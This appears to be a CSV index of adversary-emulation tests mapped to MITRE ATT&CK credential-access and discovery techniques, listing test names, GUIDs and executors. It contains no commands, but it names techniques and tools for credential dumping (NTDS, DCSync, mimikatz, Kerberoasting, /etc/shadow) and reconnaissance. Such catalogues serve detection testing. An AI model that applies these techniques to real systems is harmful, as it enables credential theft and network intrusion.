credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.007,Kubernetes List Secrets,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Kubernetes List Secrets,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
discovery,T1087.002,Account Discovery: Domain Account,1,Enumerate all accounts (Domain),6fbc9e68-5ad7-444a-bd11-8bf3136c477e,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,2,Enumerate all accounts via PowerShell (Domain),8b8a6449-be98-4f42-afd2-dedddc7453b2,powershell
discovery,T1087.002,Account Discovery: Domain Account,3,Enumerate logged on users via CMD (Domain),161dcd85-d014-4f5e-900c-d3eaae82a0f7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,4,Automated AD Recon (ADRecon),95018438-454a-468c-a0fa-59c800149b59,powershell
discovery,T1087.002,Account Discovery: Domain Account,5,Adfind -Listing password policy,736b4f53-f400-4c22-855d-1a6b5a551600,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,6,Adfind - Enumerate Active Directory Admins,b95fd967-4e62-4109-b48d-265edfd28c3a,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
discovery,T1087.002,Account Discovery: Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
discovery,T1087.002,Account Discovery: Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
discovery,T1087.002,Account Discovery: Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Policies In ADSISearcher Discovery,7ab0205a-34e4-4a44-9b04-e1541d1a57be,powershell
discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,4,Find machines where user has local admin access (PowerView),a2d71eee-a353-4232-9f86-54f4288dd8c1,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,5,Find local admins on all machines in domain (PowerView),a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
discovery,T1069.002,Permission Groups Discovery: Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the local security policy (including the password policy),510cc97f-56ac-4cd3-a198-d3218c23d889,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
